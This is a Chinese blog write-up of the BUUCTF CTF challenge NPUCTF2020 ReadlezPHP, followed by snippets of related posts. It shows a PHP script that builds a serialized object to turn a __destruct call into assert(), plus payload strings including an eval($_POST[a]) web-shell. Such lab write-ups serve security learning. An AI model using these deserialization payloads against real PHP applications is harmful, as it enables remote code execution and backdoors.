buuctf-web-[NPUCTF2020]ReadlezPHP

最新推荐文章于 2022-11-17 23:10:51 发布
最新推荐文章于 2022-11-17 23:10:51 发布
阅读量271 收藏 1
点赞数
分类专栏: 反序列化 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46079186/article/details/118945234
版权
  1. 打开题目,想查看源码发现不能右键肯定有东西,f12 查看
    找到一个链接
    在这里插入图片描述
  2. 打开拿到源代码,看样子是个反序列化
    在这里插入图片描述
  3. 关键代码
    调用_destruct函数执行echo \$b(\$a),利用这个函数执行任意我们想执行的函数
$a = $this->a;
$b = $this->b;
echo $b($a);
  1. 构造参数
<?php
class HelloPhp
{
    public $a;
    public $b;
	
}
$c = new HelloPhp;
$c->b = 'assert';       # assert()可以将整个字符串参数当作php参数执行
$c->a = 'phpinfo();';
echo urlencode(serialize($c))."<br/>";  # 结果要url编码一下输出不然,有些空格之类的不能输出
# O:8:"HelloPhp":2:{s:1:"a";s:16:"eval($_POST[a]);";s:1:"b";s:6:"assert";}
  1. 拿到flag
    flag{08d0c794-06b7-42d4-9690-e545a6441a99}
    在这里插入图片描述
~ Venus
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NPUCTF2020]ReadlezPHP
Sk1y的博客
04-25 252
考查点:php反序列化,php变量动态函数
反序列化&动态调用 [NPUCTF2020]ReadlezPHP1
m0_75178803的博客
03-28 958
在源代码上看到提示访问一下看看代码审计一下和执行漏洞:echo $b($a);在__destruct()方法里面有 echo $b($a);这个是php的特性,php可以通过这种方法动态调用方法我们可以利用这个特性弄一个后门代码如下成功蚁剑连接一下但是进去却什么都没有那我们修改代码,改去访问phpinfo成功访问。
BUUCTF Web [MRCTF2020]PYWebsite1 & [NPUCTF2020]ReadlezPHP1
网安小趴菜
11-17 589
BUUCTF Web [MRCTF2020]PYWebsite1 & [NPUCTF2020]ReadlezPHP1 wp
web buuctf [NPUCTF2020]ReadlezPHP
weixin_44214568的博客
04-07 369
知识点:assert()断言函数 assert — 检查一个断言是否为 false assert(mixed $assertion, Throwable $exception = ?): bool 如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。 1.开题: 2.查看源代码 view-source:url 在源码下面 查看,获得源码 <?php #error_reporting(0); class HelloPhp { pub.
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF部分web题目
最新发布
05-06
写题记录
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
echo在php中的意思,PHP中echo和print的区别
weixin_33160876的博客
03-09 269
一般来说,PHP中动态输出HTML内容,是通过print 和 echo 语句来实现的,在实际使用中, print 和 echo 两者的功能几乎是完全一样。可以这么说,凡是有一个可以使用的地方,另一个也可以使用。但是,两者之间也还是一个非常重要的区别:在 echo 函数中,可以同时输出多个字符串,而在 print 函数中则只可以同时输出一个字符串。同时,echo函数并不需要圆括号,所以echo函数更...
[NPUCTF2020]ReadlezPHP -wp
freerats的博客
08-14 590
查看一下源码(可以f12,也可以在页面边缘右键) 发现源代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){
[NPUCTF2020]ReadlezPHP 1[b(a)]
weixin_45577185的博客
10-16 135
f12发现了令一个网页,打开 发现代码,开始审计 __destruct()魔术方法: 属性b包裹住属性a 利用assert()函数 assert 判断一个表达式是否成立 assert()可以将整个字符串参数当作php参数执行。 构造反序列化 由b(a)可以构造b=assert,a=phpinfo ->assert(phpinfo()) 反序列化构造 payload:?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert"
[NPUCTF2020]web
SopRomeo的博客
10-27 1238
新东西 审计源码发现采用AES加密 这是拿php写的AES加密页面,emmm,这个是密码学的东西 不愧是web???? 由源码可知 AES密钥长度为128位,加密$iv和明问$data可控。 AES CBC的两种攻击手法:Padding Oracle和字节反转 这道题刚好考到这两点 Padding Oracle适合在我们可以知道iv,不清楚加密Key,能够区分解密成功与否的情况下,直接获得明文 而这题刚好可以判断解密是否成功 Padding Oracle 根据上述文章 在Padding Oracle At
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值